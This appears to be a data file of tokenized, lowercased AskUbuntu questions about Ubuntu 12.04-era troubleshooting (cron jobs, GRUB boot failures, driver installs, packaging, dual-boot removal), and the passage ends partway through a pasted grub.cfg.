154658	why does n't duply work when set as a cron job ?	i have a problem with a cron job which starts but does n't complete . running the command manually works fine . i already read the page about cron issues and solutions here on askubuntu , tried the proposed solutions but did n't find an answer working in my case . i 'm using ubuntu 12.04 . $ crontab -e shell=/bin/bash # otherwise it would be /bin/sh 59 16 * * * /bin/duply calendar backup > /tmp/duply.log btw , the cron file ends with an empty line , as someone pointed out . once the job has `` finished '' ... : $ cat /tmp/duply.log start duply v1.5.7 , time is 2012-06-22 16:59:01 . instead , running manually the script it works correctly and gives this output : start duply v1.5.7 , time is 2012-06-22 17:06:39 . [ cut ] ... here is a long output generated by duply . ... and yes , files have been backed up . [ cut ] -- - finished state ok at 17:06:42.581 - runtime 00:00:03.170 -- - i also tried to restart the cron daemon ( sudo service cron restart ) but nothing changed . do you have any suggestion to fix the issue ?
154659	any basic app packaging guide for a newbie ?	i 've made an app using wxpython , i have some .py files and some icons , how can i package it for uploading it to launchpad ? ? i 've already set a ppa and it seems like i need to organize my files before packaging , i mean the debian file structure needed to make a tar.gz source package and how to upload it ... i 've read some guides ( that have an already made tar.gz source package ) but as this is my first app i do not understand most of the things ... any help ?
154661	how to uninstall ubuntu 12.04 lts ( installed alongside win 7 from boot cd )	a few days back i installed ubuntu 12.04 alongside windows . when i put the cd in , the setup said that i should boot from cd and then i can choose from demo to install ubuntu alongside windows , i followed the instruction and selected install alongside windows 7 from the setup wizard . my win 7 drive is originally 60 gb but after installing ubuntu it appears as if it were 43 gb . now i want to uninstall ubuntu and get just win 7 back on . please guide me how to do this . presently , at start-up i get a choice to boot either into win 7 or ubuntu . i am new to ubuntu and linux both ! this is the partition layout as seen on win 7 :
154664	connect sftp in dolphin with keyfile and passphrase and nonstandard port	i am not finding an option to enter the keyfile when adding a network folder in dolphin . the `` add network folder '' type is ssh . dolphin allows me to enter a username , a server ip address , a port , the protocol ( which is sftp ) , and a folder . but dolphin does not allow me to specify the ssh key . btw , the ssh key requires a passphrase . can i make dolphin work with an ssh key that requires a passphrase ?
154665	how do i set java environment variables system wide ?	i work as java/j2ee application developer so kindly tell me how to set java_home , jre_home , classpath so that i may use tomcat , mysql , java all together in terminal . i may be using all together in a pure cli server environment , or in a gui desktop environment .
154666	why is emacs allowing multiple instances ?	around the time i fresh installed ubuntu 12.04 , i noticed that i can start multiple instances of emacs . i find this annoying because i will think that a buffer should be open , but i 'm in the wrong emacs window . i may have changed something in .emacs , but i really do n't think i did . i also reverted all of my customizations that are stored in ~/.emacs.d/custom.el . emacs previously would give some error about another emacs server being open when i would attempt to start an additional instance of it , but it no longer does this . any ideas on how to restore this behavior ?
154667	why is resume from sleep sometimes 5-10 seconds and other times 1+minutes ?	sometimes , when i resume from sleep ( otherwise known as opening my laptop lid , after putting it to sleep by closing it ) , it takes only 5-10 seconds or even less to come back to a password prompt . other times , like just now , it took closer to a minute to actually come back . i 've seen it take close to two minutes to get back from a black screen . i used to think when this occurred that the computer froze or otherwise ceased funcitoning in sleep mode and i then hard powerred off , now i 've learned patience . is this because it 's going into suspend-to-disk mode perhaps rather than suspend-to-ram ? i am always plugged in , or usually such , when this happens , so i do n't think it would have to suspend to disk . also , if it is suspend to disk that is causing this , perhaps a 'resuming ' message could come on the screen to give me an indication what is going on ? thanks for any guidance on how i can resolve this .
154671	dropbox install stuck at 99 % , how do i fix it ? ( and any dpkg errors )	i tried to install dropbox using how to install dropbox ? , or with apt-get install nautilus-dropbox . dropbox loads until 99 % and then hangs , causing the system to go to 100 % cpu usage . if i reboot or close the terminal , i sometimes get dpkg errors which prevent me from using apt-get or software center to perform any package management functions . i would like to resolve all these and just get dropbox working . how do i do that ? note : this question is possibly answered in two parts : the accepted answer tells you how to install dropbox . but if you have dpkg errors , see this answer before you use answer 1 to install dropbox .
154674	how can i seperately change the workspace on my two screens ?	i have two different screens , one fullhd and one hdready and i often have openend many windows . to manage these , the ubuntu workspaces do a good job , but it would be excellent if it could be changed seperately , so that i can have the windows on the right that are used less often but need a look on and those on the left that are needed to change often . so i could have 8 workspaces and seperately choose one for every monitor . is there anything like that ?
154675	restore keyboard layout icon and locale	i 'm an ubuntu 12.04 user , using gnome classic ( with no effects ) . i do n't know what i did , but lately instead of the keyboard layout with the locale ( for example , it , uk and so on ) a strange `` no access '' symbol appears . see the linked image . ow can i restore the default keyboard icon and the language indicator ? issuing locale -a in a terminal i get the following output : locale -a c c.utf-8 en_ag en_ag.utf8 en_au.utf8 en_bw.utf8 en_ca.utf8 en_dk.utf8 en_gb.utf8 en_hk.utf8 en_ie.utf8 en_in en_in.utf8 en_ng en_ng.utf8 en_nz.utf8 en_ph.utf8 en_sg.utf8 en_us.utf8 en_za.utf8 en_zm en_zm.utf8 en_zw.utf8 posix
154686	what can i do when ubuntu freezes for some unknown mysterious reasons ?	i 'm using ubuntu 12.04 but of some unknown reason sometime ubuntu get stuck , no motion what so ever . if i try to move a mouse it does n't respond and same thing with the keyboard . i hope at least some one gives some reply bcoz i 'm not getting replies on most of my questions .
154693	run a wine application fullscreen on a single monitor from dual-monitor setup	i have a dual-monitor system , running ubuntu 12.10 with gnome 3 desktop . i want to run a fullscreen wine application on one monitor ( i 'll call it `` secondary '' ) , while another ( `` primary '' ) will not be affected , and will continue to run regular gnome desktop . i have to use wine virtual desktop ( wine explorer /desktop=foo,1680x1050 ) , because otherwise the second monitor gets turned off and application runs on primary one . however , virtual desktop 's window does not occupy the whole sceen because of window decorations . i 've removed them from maximized windows using this recipe , but the window is not maximized ( although , it 's resizable ) and ca n't be maximized using its context menu . there 's no gnome panel or any other obstacles on the secondary monitor . if i could get rid of decorations i 'll achieve exactly what i want . is there any way i could either forcibly maximize wine 's virtual desktop window , or tell metacity this window must be not decorated ? or , maybe , there 's another approach ? i 've obviously tried winecfg 's `` allow the window manager to decorate/control the windows '' options , but they do n't seem to affect virtual desktop window . the application ca n't be run windowed by itself and always goes fullscreen . please note , i explicitly do n't want to setup monitors as separate x11 displays , each running separate x server .
154694	how do i establish a mobile broadband connection from the command line ?	i run ubuntu 12.04 on an old imac g3 . since the gui is too resource heavy i have disabled the display manager ( lightdm ) and am currently running the computer in console mode . how do i establish a mobile broadband connection from the command line ? when i connect the modem it shows up as ttyusb0 in the network manager device list : $ nmcli dev device type state ttyusb0 gsm disconnected eth0 802-3-ethernet unavailable i have also copied a working connection configuration file from another computer to /etc/networkmanager/system-connections/com\ hem\ default\ 1 . still , when i try to connect i get an `` unknown connection '' error : $ nmcli con up id `` com hem default 1 '' error : unknown connection : com hem default 1 . any clues ?
154696	how can i get my built-in microphone to work on a lenovo g770 ?	i am dual booting ubuntu 12.04 on a lenovo g770 . the internal mic works fine in windows 7 . the mic is recognized and unmuted , but it just is n't detecting any sound . i tried messing around with pavucontrol settings , but to no avail .
154697	phone connecting as mass-storage : how can i import photos ?	when i connect my android phone to ubuntu computed via usb , no photos can be imported . the new usb drive is opened instead containing my various junk from sd-card which is a phone 's optional external storage . the partition holding photos & videos is unaccessible .
154699	how do i install the cisco anyconnect vpn client ?	i installed cisco anyconnect for ubuntu ( 64 ) 12.04 , but it failed . it can be installed on ubuntu 10.10 ( 64 ) . the error log installing cisco anyconnect vpn client ... extracting installation files to /tmp/vpn.teusir/vpninst096243274.tgz ... unarchiving installation files to /tmp/vpn.teusir ... starting the vpn agent ... /opt/cisco/vpn/bin/vpnagentd : error while loading shared libraries : libxml2.so.2 : can not open shared object file : no such file or directory when i meet that , locate libxml2.so.2 /usr/lib/x86_64-linux-gnu/libxml2.so.2 /usr/lib/x86_64-linux-gnu/libxml2.so.2.7.8 so i create symbol link libxml2.so.2 in /user/lib and after i do : installing cisco anyconnect vpn client ... extracting installation files to /tmp/vpn.5cz4fv/vpninst001442979.tgz ... unarchiving installation files to /tmp/vpn.5cz4fv ... starting the vpn agent ... /opt/cisco/vpn/bin/vpnagentd : error while loading shared libraries : libxml2.so.2 : wrong elf class : elfclass64 i ensure that there exist lib32 runtime lib on my device . how can i fix this ?
154700	ubuntu laptop wont boot after failed upgrade	i 'm kind of new to this , so please stay with me . i have an ubuntu laptop from system 76 . i keep it relatively up-to-date , and last night it prompted me to upgrade to 12.04 . i started the upgrade and went to sleep . when i woke up , it had finished downloading packages , and looked like it had just started installing . a few hours later , it was in the same place and everything seemed totally locked up . after about 3 hours of no movement , i decided to risk a reboot . well , it did n't go so well . i 've entered some sort of recovery terminal and hope there are some magic commands i can enter to finish the upgrade . in the meantime i started a download of ubuntu 12.04 lts on another computer . what do i do from here ? if i end up needing to use the downloaded installer , how can i finish the upgrade using that ? i have some very important files on this computer . though they are backed up , it would still be a tremendous hassle if i ca n't access them . thanks ! edit : if i need to go the use an installer file route , i 'm downloading the file on a mac . can i just follow the instructions on the website to put it on a flash drive , or since i hope to use it to boot an ubuntu computer do i need to go about things differently ?
154706	quickly wo n't package my app ( 11.10 )	as the title suggests , i have n't been able to package my app with quickly on ubuntu 11.10 . here 's the output phoenix87 @ nestofheliopolis : ~/programming/python/gtumbler $ quickly package ... ... .. -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- command returned some errors : -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- error : python module generic not found error : python module utils not found error : python module filters not found error : python module xmp not found error : python module system not found error : python module pdf not found -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- command returned some warnings : -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- ( setup.py:10740 ) : gtk-warning ** : unable to locate theme engine in module_path : `` pixmap '' , warning : the following files are not recognized by distutilsextra.auto : gtumbler_lib/pdf.edited/.git/head gtumbler_lib/pdf.edited/.git/config gtumbler_lib/pdf.edited/.git/description gtumbler_lib/pdf.edited/.git/hooks/applypatch-msg.sample gtumbler_lib/pdf.edited/.git/hooks/commit-msg.sample gtumbler_lib/pdf.edited/.git/hooks/post-commit.sample gtumbler_lib/pdf.edited/.git/hooks/post-receive.sample gtumbler_lib/pdf.edited/.git/hooks/post-update.sample gtumbler_lib/pdf.edited/.git/hooks/pre-applypatch.sample gtumbler_lib/pdf.edited/.git/hooks/pre-commit.sample gtumbler_lib/pdf.edited/.git/hooks/pre-rebase.sample gtumbler_lib/pdf.edited/.git/hooks/prepare-commit-msg.sample gtumbler_lib/pdf.edited/.git/hooks/update.sample gtumbler_lib/pdf.edited/.git/index gtumbler_lib/pdf.edited/.git/info/exclude gtumbler_lib/pdf.edited/.git/logs/head gtumbler_lib/pdf.edited/.git/logs/refs/heads/trunk gtumbler_lib/pdf.edited/.git/objects/pack/pack-71084b8190f9a925d45b9689fb6b81332c525583.idx gtumbler_lib/pdf.edited/.git/objects/pack/pack-71084b8190f9a925d45b9689fb6b81332c525583.pack gtumbler_lib/pdf.edited/.git/packed-refs gtumbler_lib/pdf.edited/.git/refs/heads/trunk gtumbler_lib/pdf.edited/.git/refs/remotes/origin/head -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- do you want to continue ( this is not safe ! ) ? y/ [ n ] : y ubuntu packaging created in debian/ ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... .. -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- command returned some errors : -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- error : python module generic not found error : python module utils not found error : python module filters not found error : python module xmp not found error : python module system not found error : python module pdf not found -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- command returned some warnings : -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- ( setup.py:10965 ) : gtk-warning ** : unable to locate theme engine in module_path : `` pixmap '' , warning : the following files are not recognized by distutilsextra.auto : gtumbler_lib/pdf.edited/.git/head gtumbler_lib/pdf.edited/.git/config gtumbler_lib/pdf.edited/.git/description gtumbler_lib/pdf.edited/.git/hooks/applypatch-msg.sample gtumbler_lib/pdf.edited/.git/hooks/commit-msg.sample gtumbler_lib/pdf.edited/.git/hooks/post-commit.sample gtumbler_lib/pdf.edited/.git/hooks/post-receive.sample gtumbler_lib/pdf.edited/.git/hooks/post-update.sample gtumbler_lib/pdf.edited/.git/hooks/pre-applypatch.sample gtumbler_lib/pdf.edited/.git/hooks/pre-commit.sample gtumbler_lib/pdf.edited/.git/hooks/pre-rebase.sample gtumbler_lib/pdf.edited/.git/hooks/prepare-commit-msg.sample gtumbler_lib/pdf.edited/.git/hooks/update.sample gtumbler_lib/pdf.edited/.git/index gtumbler_lib/pdf.edited/.git/info/exclude gtumbler_lib/pdf.edited/.git/logs/head gtumbler_lib/pdf.edited/.git/logs/refs/heads/trunk gtumbler_lib/pdf.edited/.git/objects/pack/pack-71084b8190f9a925d45b9689fb6b81332c525583.idx gtumbler_lib/pdf.edited/.git/objects/pack/pack-71084b8190f9a925d45b9689fb6b81332c525583.pack gtumbler_lib/pdf.edited/.git/packed-refs gtumbler_lib/pdf.edited/.git/refs/heads/trunk gtumbler_lib/pdf.edited/.git/refs/remotes/origin/head -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- an error has occurred during package building error : package command failed aborting also how can i get rid of all ( or at least most of ) those unrecognized files ? thanks a lot !
154708	control notification display time or better close them	the unity notifications ( notify-osd ) are very much useful and nice . but it seems i ca n't close them after i get notified . they get blurred when i hover mouse over them , but they do n't close . which is sometimes very annoying . i googled about the matter and it seems , there is no way to close them until now . can i at least control their notification display time ? ( if i can close them , that will be lot better ) . i think , it will be easy by changing some of their settings file . note that , i am using ubuntu 12.04 with unity , specifically unity 3d .
154716	how do i change the indicator menu labels ?	i use ubuntu 12.10 and unity theme . i wanted to change some of the labels like shut down ... to turn off or something else . wanted to know where such labels are stored so i can could change a few of them . is it possible to edit a few files and get this change done ? thanks in advance .
154719	edited libappmenu.so and now apps only run as root	so i was trying to add global menu support for eclipse from this short fix from here and it worked . i tried adding another application into that by typing the application in there as well and it did n't work , so i removed it . since then , i ca n't run a lot of applications after a restart . they all say segmentation fault ( core dump ) . here is a core dump file from one application synergy : https : //gist.github.com/2974295 this only seems to be happening to my user account though . other accounts and root can start up fine.. i would really appreciate the help !
154720	delete ubuntu file from windows	how can i delete one file from ubuntu using windows . i installed ubuntu 10.04 but i have some issues witch i ca n't solve without deleting or changing one file , but every time i boot ubuntu my mouse stop working and my keyboard goes crazy , it just repeating to write one character .
154721	failed ubuntu installation	so i downloaded ubuntu 12.04 and i unzipped the folder . i did n't burn it on a dvd i just launched it of the download folder . i clicked on the wubi.exe icon and proceeded to fill out the items and when i clicked next the time remaining said it was 3 hours so i canceled it . after i burnt it on a dvd and launched the wubi.exe icon it just prompt me with demo and full installation and learn more . so how do i fix this ?
154722	triple boot vista xp ubuntu	my partition table is pretty messed up from install/uninstall os and what i want to do now is to clear that and have vista/xp/ubuntu 12.04 on the same hard drive . i have create a new partition for xp on vista , everything was fine , but when i restarted my pc , i was getting the grub restore prompt . even when i was trying to install xp , when the 'lunch windows ' came , a wild bsod appear . so i have deleted my partition for xp using gparted include in the 12.04 live cd . this have n't resolve the problem and i am still unable to boot in vista nor ubuntu . but i realy what this triple boot for lol purpose ( since my vista installation keep giving latency spike in this game and i hope this will not be the case in a fresh xp installation ( i have tested it in ubuntu , the ping was good , but the fps was n't ) . so what i want to do , is to install xp on a partition , then be able to boot on any of them without a problem from a nice installation of grub or something . [ edit ] so , i have xp on /dev/sda1 , vista on /dev/sda2 and ubuntu on /dev/sda3 , how do i configure grub2 for all those os ? here the result of fdisk . disk /dev/sda : 640.1 gb , 640135028736 bytes 255 heads , 63 sectors/track , 77825 cylinders , total 1250263728 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0xd5d9d5d9 device boot start end blocks id system /dev/sda1 63 41929649 20964793+ 7 hpfs/ntfs/exfat /dev/sda2 * 41945088 558931885 258493399 7 hpfs/ntfs/exfat /dev/sda3 558931968 646098943 43583488 83 linux /dev/sda4 646100992 1250260991 302080000 7 hpfs/ntfs/exfat thanks for help . sorry for my english .
154736	how do i include basic image editing in my python application ?	i am making an application for the ubuntu app showdown and i want to include basic image editing like adding black and white , grey effects etc to the image . but i do n't know how to do that . i have been reading about pil and i have tried it and i ca n't get it to work . so if you could help me with an example or a link to tutorial or something else it would be very helpful . thanks .
154737	how do i install drivers for a konica minolta 200 ?	this copy machine / scanner / network printer works with windows but no drivers are available for linux . when ubuntu supports a printer it works fine but this one is not supported . i found the drivers in : http : //onyxftp.mykonicaminolta.com/download/searchresults.aspx ? productname=bizhub % 20200 //but i do n't know how to install them , nor which one to download . //how can i install this driver ? edit : the file with the driver is here http : //onyxftp.mykonicaminolta.com/downloadfile/download.ashx ? fileid=18571 & productid=865 inside the archive there is a .deb package that installs correctly but does n't work . so far the question is : `` how can i make it work ? ''
154740	the package `` libpango '' has a problem , blocking installation of other packages , how do i fix it ?	i get the following errors while trying to install any package . package : libpango1.0-0 error : libpango1.0-0 : amd64 1.30.0-0ubuntu3 can not be configured because libpango1.0-0 package : libgtk-3-0 error : dependency problems - leaving unconfigured package : firefox error : dependency problems - leaving unconfigured package : firefox-globalmenu error : dependency problems - leaving unconfigured package : flashplugin-installer error : dependency problems - leaving unconfigured i tried to configure libpango1.0-0 but i got the following error : libpango1.0-0 : amd64 1.30.0-0ubuntu3 can not be configured because libpango1.0-0 : i386 is in a different version ( 1.30.0-0ubuntu2 ) i appreciate your assistance . thanks .
154743	how do i get the restricted drivers update on xubuntu , does not show-up in update manager ?	how do i get the restricted drivers update on xubuntu , does not show-up in update manager ? the restricted driver icon is not available on the launch bar on top .
154744	how would i report a bug in the paste.ubuntu.com service ?	i assume that http : //paste.ubuntu.com/ is an official service from ubuntu , other `` ubuntu '' sites have a link to report problems with them ( for example apps.ubuntu.com - which links to launchpad and has is own page ) but with ubuntu pastebin i ca n't find any way to report a problem , or a specfic launchpad page which deals with site . is there one for it , and if not how should i report a problem ?
154745	how to upload a package to launchpad using quickly	i 've successfully reached the point , where i was able to persuade quickly to upload my testing package to launchpad with almost no error . however , i 've got the following problem : get launchpad settings launchpad connection is ok ... ... ... ubuntu packaging created in debian/ ... ... .pushing to launchpad ... ... ... ... ... ... ... ... ... ..checking signature on .changes gpg : signature made fri jun 22 21:28:42 2012 cest using rsa key id 03790459 gpg : good signature from `` zubozrout < zubozrout @ gmail.com > '' good signature on ../omega_12.06.6_source.changes . checking signature on .dsc gpg : signature made fri jun 22 21:28:42 2012 cest using rsa key id 03790459 gpg : good signature from `` zubozrout < zubozrout @ gmail.com > '' good signature on ../omega_12.06.6.dsc . uploading to ppa ( via ftp to ppa.launchpad.net ) : uploading omega_12.06.6.dsc : done . uploading omega_12.06.6.tar.gz : done . uploading omega_12.06.6_source.changes : done . successfully uploaded packages . traceback ( most recent call last ) : file `` /usr/share/quickly/templates/ubuntu-application/release.py '' , line 287 , in < module > release_version ) , changelog ) file `` /usr/share/quickly/templates/ubuntu-application/internal/launchpad_helper.py '' , line 57 , in push_tarball_to_launchpad release = create_release ( project , version ) file `` /usr/share/quickly/templates/ubuntu-application/internal/launchpad_helper.py '' , line 44 , in create_release date_targeted=release_date ) file `` /usr/lib/python2.7/dist-packages/lazr/restfulclient/resource.py '' , line 573 , in __call__ url , in_representation , http_method , extra_headers=extra_headers ) file `` /usr/lib/python2.7/dist-packages/lazr/restfulclient/_browser.py '' , line 281 , in _request raise error lazr.restfulclient.errors.unauthorized : http error 401 : unauthorized response headers : -- - -content-encoding : gzip content-length : 65 content-type : text/plain date : fri , 22 jun 2012 19:28:46 gmt server : zope.server.http ( http ) status : 401 strict-transport-security : max-age=2592000 vary : accept , accept-encoding via : 1.1 api.launchpad.net x-content-type-options : nosniff x-frame-options : sameorigin x-lazr-notifications : [ ] x-powered-by : zope ( www.zope.org ) , python ( www.python.org ) x-xss-protection : 1 ; mode=block -- - response body : -- - ( < productseries at 0x14030190 > , 'newmilestone ' , 'launchpad.edit ' ) -- - error : release command failed aborting thanks for any help .
154755	webserver folder can not be accessed without using root	my webserver folder , called www , can not be accessed without using root . any ideas ?
154761	choppy flash audio	playing flash videos ( youtube and standalone flash ) gives me choppy audio and video . it seems intermittent , i was playing youtube videos earlier with no problems ... now i ca n't . using : 64 bit 12.04 google chrome 64 bit nvidia drivers from ppa flash plugin version : 11.2.202.236 could anyone offer any advice ? thank you . constantin
154770	alps touchpad on dell : how do i install the dkms driver to enable multitouch ?	now i know that this has been asked several times here but i could n't find any decent solution to it . i am running ubuntu 12.04 on my dell n5110 and my touchpad is detected as a mouse , so i do n't have the touchpad options availiable . ca n't use multitouch and ca n't disable it either . i have tried the dkms driver from this link . but when i tried to install it with dpkg -i command , dpkg returns the following error : error ( dkms apport ) : unable to determine source package for psmouse-alps-dkms error ! bad return status for module build on kernel : 3.2.0-25-generic-pae ( i686 ) consult /var/lib/dkms/psmouse-alps/0.10/build/make.log for more information . i have installed all the updates as well . can someone help me out with this issue ?
154776	ethernet cable is n't being detected in ubuntu 12.04	i installed ubuntu 12.04 smoothly . but for updation etc when i want to connect with my wired cable internet connection , find that all are same like the previous version and i put all ip address , dns etc properly and find the save button was vanished ! i use ubuntu for 7 years , but this the first time again i have to install the old version 11.10 . please advice . i installed it two times and same thing happen . now-a-days i use the previous version . looking for a step by step tutorial where save button will not be vanished when i put my dns . my cable is working properly in windows 7 from where i send the mail .
154779	why is wpa-encrypted ad-hoc mode disabled in 12.04 ?	or , alternatively , how can i check that some wifi chip supports wpa-encrypted hotspot creation ? is it hardware-dependent ? is anyone able to create wpa-encrypted hotspot ? update : see the discussion at http : //chat.stackexchange.com/transcript/3874 related bug reports : https : //bugs.launchpad.net/ubuntu/+source/network-manager/+bug/905748 https : //bugzilla.gnome.org/show_bug.cgi ? id=654772
154782	which package manages the ctrl+f function ?	i 'm trying to find out which package manages the ctrl+f ( find ) function . i need this so i can properly file a bug ; the ctrl+f function is constantly being launched on whatever application i have on top , and it 's really annoying . i 've ruled out hardware issues , and just need to find which packaged ctrl+f belongs to so i can file the correct information . i 've tried searching with apt-cache ; combing through synaptic ; and searching packages.ubuntu.com , ubuntu forums and launchpad , but the search terms ctrl+f and find are just too general . if someone knows which package i need to report , or would know where to search , i 'd be grateful .
154784	how do you remove ubuntu ?	i have no idea what was deleted or uninstalled or even what system ran previously on the computer . the computers are public computers for an office and no one know 's how to use this system ! most people ca n't figure it out and have never even heard of it ( i have because i knew someone who ran it ) ! ! so how do i remove it ? is there anyway to just do a virtual restore ? i 'm hoping it was windows 7 on here previously cause do n't most 7 systems have a built in windows installation disk iso ? anyone know how or if this can be fixed ? ? no we do n't have the re-installation disks ( if we did i would know the system and not have a problem ) help ! ! ! !
154791	alternate between windows on launcher click	there is no way to set unity to change between opened windows by clicking on the laucher incon ? everytime i want to change a window of the same program i have to use the keyboard !
154793	separate sysklogd remote log messages	after i 've tried to understand how syslog is working in ubuntu i found out that the package that exist is sysklogd ( syslogd & klogd combination ) . what i want to do is to get my router messages ( which i 've succeed in ) but to a separate file . i saw that it is possible through rsyslog with ruleset . how is it possible to do it by sysklogd ?
154798	adding new desktop background to existing backgrounds folder	i want to set a new image as my desktop background , but i also want this image to act as the background to the login screen . as i understand it , in order to do this , the image needs to be outside my encrypted home folder otherwise it will be inaccessible before ive logged in . i have added the image in question to /usr/share/backgrounds - the same location that all of the other 'standard ' wallpapers are stored in . i have set ownership of the image to root . however , when i go to select the image as my wallpaper i am not able to see it in the list of available wallpapers ( under the 'wallpapers ' option ) and there appears to be no way to select an image from an arbitrary location . any suggestions ?
154803	how do i return to a previous kernel ?	i downloaded and installed the 3.0.0-21 update to the kernel . it caused several problems including : firefox not asking for a folder before placing a url into bookmarks ubuntu 11.10 not automatically opening to the desktop ( i still have n't figuring out a viable work around ) . this may be an inability to hibernate and reinstall , but i believe i also had problems after shutdown and booting . i have tried to learn how to return to the former 3.0.0-19 , but i ca n't find anything to teach me . i would like to know how to return to the -19 configuration or how to reinstall the -21 configuration .
154806	journaling backup	is there any software that takes journaled backups for ubuntu ? i 'm currently using the built-in deja-dup , which is great . however , it backs up at most once every 24 hours ( daily ) . is there any way to have a backup system in ubuntu that backs up a file every time it 's changed ? also : could and/or would it make sense for a file-level backup system make use of ext4 's journaling features ? or am i misunderstanding ext4 as a `` journaling filesystem '' ? edit : perhaps ext4 journaling is ill-suited for this task . in that case , is there software that runs a daemon tracking real-time file changes , and backs up accordingly ?
154807	ubuntu crashes at boot	i have recently installed ubuntu 12.04 alongside windows 7 and was having trouble changing brightness . however , i found what was apparently a solution , it involved changing a directory i can not remember sorry , however now ubuntu crashes at the logo when starting up . i am unsure how to navigate recovery mode to get back and delete my changes , any help would be appreciated . [ edit ] now when booting it only displays in text , windows 7 boots fine however , just need to undo my error it seems but unsure how to navigate back to this file .
154809	how isolated are windows and wubi-ubuntu installations ?	if i install ubuntu via wubi , i would like to still use windows for many things , like playing some games not available on ubuntu . while using ubuntu , if i encountered an executable that would normally infect windows , would anything happen to the host windows operating system ? would windows have the virus that i downloaded , or are the two operating systems completely separated ? another thing : are files saved in windows openable from ubuntu and files saved in ubuntu are openable from windows ?
154810	how do i easily download ubuntu isos via bittorrent from the command line ?	i want to download an ubuntu iso , preferably over bittorrent , and verify its integrity . currently , the following steps are required : start web browser , go to ubuntu.com , find download link find gpg signature for the checksums get the gpg key to check gpg signature of the checksums wait until download finished gpg verifiy checksum verification is n't there a simpler way ? just like apt-get install 12.04-64bit-ubuntu-iso apt-get install 12.04-32bit-server-iso etc. ? of course , apt-get ( or whatever it would be called ) should download over bittorrent to remove load from the servers . if it does n't exist , it should probable post that at ubuntu brainstorm ? is there already such a tool ? i wanted to ask before posting to brainstorm .
154820	grub is installed on the usb drive	i tried to install ubuntu 12 . 04 using usb on hp pavilion dv4 which has windows 7 home premium . the installation went smooth , but after rebooting it directly booted into windows 7 . when i inserted the usb device it showed the grub menu . i suppose the boot loader got installed on the usb device . can any one give me a solution to this ?
154831	system will not boot without usb thumb drive inserted	i 've had this issue before when trying out linux mint , but i was unable to get any assistance . i was then lead to believe that it was a problem related to mint , and not grub . i installed ubuntu 12.04 tonight on a second partition alongside windows 7 . i installed from a usb stick , and everything went peachy until i rebooted without the stick in my tower . it now says : error : no such device : 20cec6ca-4024-4237-84c3-2dba3c851497 grub rescue > i 've verified via ls -l /dev/disk/by-uuid that my drive where ubuntu is installed matches the uuid that supposedly does n't exist . the uuid of my thumb drive when inserted happens to be 06b3-9c68 . there is no mention of my usb drive 's uuid anywhere in /boot/grub/grub.cfg i 've also tried to re-install grub after booting into my system , removing the stick , and running grub-install /dev/sda . it still happens , and i can not boot without the usb drive inserted into the computer . and what really gets my goat is that the boot order of my system is cdrom > hard drive > usb . it 's not even reaching the usb to try to boot from it , so why does it matter that it 's not there ? edit : also , i ran grub-config without the stick in followed by another grub-install . still no go . fwiw , here 's my grub.cfg file : # # do not edit this file # # it is automatically generated by grub-mkconfig using templates # from /etc/grub.d and settings from /etc/default/grub # # # # begin /etc/grub.d/00_header # # # if [ -s $ prefix/grubenv ] ; then set have_grubenv=true load_env fi set default= '' 0 '' if [ `` $ { prev_saved_entry } '' ] ; then set saved_entry= '' $ { prev_saved_entry } '' save_env saved_entry set prev_saved_entry= save_env prev_saved_entry set boot_once=true fi function savedefault { if [ -z `` $ { boot_once } '' ] ; then saved_entry= '' $ { chosen } '' save_env saved_entry fi } function recordfail { set recordfail=1 if [ -n `` $ { have_grubenv } '' ] ; then if [ -z `` $ { boot_once } '' ] ; then save_env recordfail ; fi ; fi } function load_video { insmod vbe insmod vga insmod video_bochs insmod video_cirrus } insmod part_msdos insmod ext2 set root= ' ( hd1 , msdos5 ) ' search -- no-floppy -- fs-uuid -- set=root 20cec6ca-4024-4237-84c3-d2ba3c851497 if loadfont /usr/share/grub/unicode.pf2 ; then set gfxmode=auto load_video insmod gfxterm insmod part_msdos insmod ext2 set root= ' ( hd1 , msdos5 ) ' search -- no-floppy -- fs-uuid -- set=root 20cec6ca-4024-4237-84c3-d2ba3c851497 set locale_dir= ( $ root ) /boot/grub/locale set lang=en_ca insmod gettext fi terminal_output gfxterm if [ `` $ { recordfail } '' = 1 ] ; then set timeout=-1 else set timeout=10 fi # # # end /etc/grub.d/00_header # # # # # # begin /etc/grub.d/05_debian_theme # # # set menu_color_normal=white/black set menu_color_highlight=black/light-gray if background_color 44,0,30 ; then clear fi # # # end /etc/grub.d/05_debian_theme # # # # # # begin /etc/grub.d/10_linux # # # function gfxmode { set gfxpayload= '' $ 1 '' if [ `` $ 1 '' = `` keep '' ] ; then set vt_handoff=vt.handoff=7 else set vt_handoff= fi } if [ $ { recordfail } ! = 1 ] ; then if [ -e $ { prefix } /gfxblacklist.txt ] ; then if hwmatch $ { prefix } /gfxblacklist.txt 3 ; then if [ $ { match } = 0 ] ; then set linux_gfx_mode=keep else set linux_gfx_mode=text fi else set linux_gfx_mode=text fi else set linux_gfx_mode=keep fi else set linux_gfx_mode=text fi export linux_gfx_mode if [ `` $ linux_gfx_mode '' ! = `` text '' ] ; then load_video ; fi menuentry 'ubuntu , with linux 3.2.0-25-generic-pae ' -- class ubuntu -- class gnu-linux -- class gnu -- class os { recordfail gfxmode $ linux_gfx_mode insmod gzio insmod part_msdos insmod ext2 set root= ' ( hd1 , msdos5 ) ' search -- no-floppy -- fs-uuid -- set=root 20cec6ca-4024-4237-84c3-d2ba3c851497 linux /boot/vmlinuz-3.2.0-25-generic-pae root=uuid=20cec6ca-4024-4237-84c3-d2ba3c851497 ro quiet splash $ vt_handoff initrd /boot/initrd.img-3.2.0-25-generic-pae } menuentry 'ubuntu , with linux 3.2.0-25-generic-pae ( recovery mode ) ' -- class ubuntu -- class gnu-linux -- class gnu -- class os { recordfail insmod gzio insmod part_msdos insmod ext2 set root= ' ( hd1 , msdos5 ) 